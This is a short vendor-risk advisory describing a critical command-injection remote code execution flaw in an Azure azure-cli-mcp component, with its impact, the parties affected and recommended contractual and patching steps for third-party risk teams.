Critical Zero‑Day Remote Code Execution Vulnerability in Microsoft Azure MCP AzureCliService
What Happened — A zero‑day command‑injection flaw (CVE‑2026‑XXXXX) in the azure-cli-mcp component of Microsoft Azure allows unauthenticated attackers to execute arbitrary code on the Azure Managed Control Plane (MCP) server. The vulnerability was disclosed by the Zero Day Initiative on 24 Mar 2026 and is rated 9.8 (Critical) by CVSS.
Why It Matters for TPRM —
- Cloud‑hosted workloads that rely on Azure MCP can be taken over without any credentials, jeopardizing confidentiality, integrity, and availability of downstream services.
- Third‑party SaaS providers that run on Azure inherit this risk, potentially exposing their customers’ data.
- The exploit requires only network access, making it attractive for nation‑state and ransomware actors seeking a foothold in high‑value cloud environments.
Who Is Affected — Cloud service providers, SaaS vendors, and enterprises that host workloads on Microsoft Azure (CLOUD_INFRA, CLOUD_HOST).
Recommended Actions —
- Immediately review Azure service contracts for clauses covering zero‑day remediation and vendor notification.
- Verify that Azure’s “Managed Service Identity” and network segmentation are correctly configured to limit blast radius.
- Engage Microsoft support to confirm patch status; apply any out‑of‑band updates as soon as they are released.
- Conduct a rapid risk assessment of any internal services that depend on Azure MCP and consider temporary migration or additional monitoring.
Technical Notes — The flaw stems from insufficient validation of a user‑supplied string before it is passed to a system call in azure-cli-mcp. Exploitation requires no authentication, no user interaction, and results in full code execution with MCP server privileges. No specific data type is disclosed, but the server runs tenant‑level orchestration code, so compromise could lead to data exfiltration or service disruption. Source: Zero Day Initiative advisory